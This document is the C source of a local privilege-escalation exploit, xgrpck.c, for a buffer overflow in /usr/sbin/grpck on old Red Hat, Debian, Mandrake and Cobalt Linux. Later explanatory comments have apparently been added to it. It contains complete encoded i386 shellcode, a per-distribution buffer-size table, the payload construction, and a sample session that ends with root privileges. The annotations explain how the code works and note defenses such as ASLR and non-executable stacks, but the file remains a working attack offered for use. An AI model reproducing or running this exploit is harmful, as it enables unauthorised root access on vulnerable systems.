/usr/sbin/grpck local buffer overflow exploit. Note that grpck is not setuid by default. Tested on Red Hat 7.3 and 8.0, Cobalt Linux 6.x and 7.x, Debian 2.1 and 2.2, and Mandrake 8.1 and 8.2.
2f0dd037d94f0621fdf5899a98d3b4876af41cefc6e9b04e0ac95bd98280d88a
/**** xgrpck.c /usr/sbin/grpck local buffer overflow exploit
*
**** when you've compiled and run xgrpck.c, you'll have euid=0 on the system
**** please send me your opinion by e-mail or IRC. :)
*
**** Users;
*
**** h4x0r & Script Kiddies & Lamers & Newbies for local buffer overflow exploit
*
**** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning
**** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning
**** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning
****
**** -sh-2.05b$ ls -la /usr/sbin/grpck
**** -rwxr-xr-x 1 root root 22316 Aug 28 2001 /usr/sbin/grpck
**** /usr/sbin/grpck is not setuid (no +s mode)
*
* Vuln Sys ;
*
**** ******* Gentoo Linux *** * *** not tested
**** ******* SlackwareLinux *** * *** not tested
**** Testing RedHat Linux 7.3 & 8.0 r0073d
**** Testing Cobalt Linux 6.x & 7.x r0073d
**** Testing Mandrake Linux 8.1 & 8.2 r0073d
**** Testing Debian Linux 2.1 & 2.2 r0073d
**** Testing RedHat Linux 6.x all version no root
**** Testing SuSE Linux x.x all version no root
*
**** Target buffers ;
*
**** RedHat 7.3 & 8.0 : 2517
**** Cobalt 6.x & 7.x : 2197
**** Mandrake 8.1 & 8.2 : 2391
**** Debian 2.1 & 2.2 : 2887 / you can change the target buffer
****
**** Usage ;
*
**** sh-2.05b$ /usr/sbin/grpck `perl -e '{print"1337"x2520}'`
**** Segmentation fault (core dumped)
**** sh-2.05b$ gcc -o xgrpck xgrpck.c
**** sh-2.05b$ ./xgrpck
**** xgrpck.c /usr/sbin/grpck local buffer overflow exploit
**** manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com
*
**** w00w0w0000 ! very nice a Day :-D
**** Buffer: 2520
**** sh-2.05b#
**** sh-2.05b# uname -a
**** Linux localhost 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 GNU/Linux
**** sh-2.05b# cat /etc/redhat-release
**** Red Hat Linux release 8.0 (Psyche)
**** sh-2.05b# id
**** uid=513(scan) gid=513 euid=0(root) groups=1(staff)
*
* manowaR@DALnet www.rsf.gen.tr e-mail : Rammstein@secureroot.com
*
* 10 December 2003 05:13
* Greetz: xmax , irc.ulak.net #root my Channel & my Brothers :PcKiLLeR - Avicenna - Pink-cashmere etc ...
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
/* sh33lc0d3 by xmax@EFnet
 *
 * i386 Linux payload that ends up in grpck's argv[1].  Read literally,
 * the bytes start with a jmp/call pair (\xeb\x35 ... \xe8\xc6\xff\xff\xff)
 * to find their own address, add 0x30 to bytes 1, 2, 3, 5 and 6 of the
 * trailing 7-byte string (\x80\x46\x01\x30 and friends) so that string
 * is stored without a NUL and decoded only at run time, then issue
 * int 0x80 twice (\xcd\x80).  No byte of the array is \x00, which is
 * what lets it survive being copied as a C string.  Analyst note: this
 * is a fixed, well-known byte pattern; a non-executable stack or a
 * stack-protector build of grpck stops it from ever executing.
 */
char sh33lc0d3[] =
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
/*
 * Returns the current stack pointer on i386.
 *
 * The asm copies %esp into %eax and the function then falls off the end
 * with no C `return`; it relies on %eax being the return register.  That
 * is undefined behaviour in standard C and works only on i386 and only
 * at optimisation levels that leave the asm/epilogue in place (presumably
 * -O0).  The value is used in main() as a guessed stack address, which
 * is meaningful only on a kernel without stack ASLR.
 */
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
/*
 * Builds an oversized argv[1] and execs /usr/sbin/grpck with it.
 *
 * bsize is the distribution-specific length from the "Target buffers"
 * table in the header (2517 = RedHat), rounded up to a multiple of 6.
 * The buffer is filled with the constant 0xbfffe5bc, the stack address
 * from get_sp() is stored 6 bytes before the end, and the payload is
 * copied in ending 8 bytes before the end.  Both addresses assume a
 * fixed stack layout (no ASLR); on a system that randomises the stack,
 * builds grpck with stack protection, or has a non-executable stack,
 * the same input simply crashes grpck.  argc/argv are unused.
 */
int main(int argc, char **argv) {
int bsize = 2517; /* buffer size for Redhat Linux; see "Target buffers" in the header */
unsigned long addr; /* stack address captured from get_sp() */
char *buff;         /* argv[1] passed to grpck; never NUL-terminated, see below */
int i;
/* round bsize up to the next multiple of 6 */
if (bsize % 6 != 0) {
bsize = bsize + 6 - (bsize % 6); }
buff = (char *)malloc(bsize); /* result is not checked for NULL */
addr = get_sp();
system("clear"); /* cosmetic; spawns a shell just to clear the terminal */
fprintf(stderr, "xgrpck.c /usr/sbin/grpck local buffer overflow exploit\n");
fprintf(stderr, "manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com\n\n", addr); /* addr has no matching %-conversion and is ignored */
fprintf(stderr, "w00w0w0000 ! very nice a Day :-D \n", addr); /* same: unused extra argument */
fprintf(stderr, "Buffer: %d\n", bsize);
/* Stores a long (4 bytes on i386) at every byte offset 0..bsize-1, so
 * the last three iterations write past the end of the malloc'd block
 * (a heap overrun inside this program itself).  0xbfffe5bc has no 0x00
 * byte, so the fill leaves the C string without a terminator. */
for(i = 0; i < bsize; i++)
{
*(long *)&buff[i] = 0xbfffe5bc;
}
*(long *)&buff[bsize - 6] = addr; /* guessed stack address, stored in native byte order */
/* memcpy and strlen are declared in <string.h>; only <strings.h> is
 * included above, so these are implicit declarations (C89 behaviour). */
memcpy(buff + bsize - strlen(sh33lc0d3) - 8, sh33lc0d3, strlen(sh33lc0d3));
/* buff carries no terminating NUL, so execl reads beyond the allocation
 * until it happens to find one. */
execl("/usr/sbin/grpck", "grpck", buff, NULL);
return 0;
}
/* manowaR */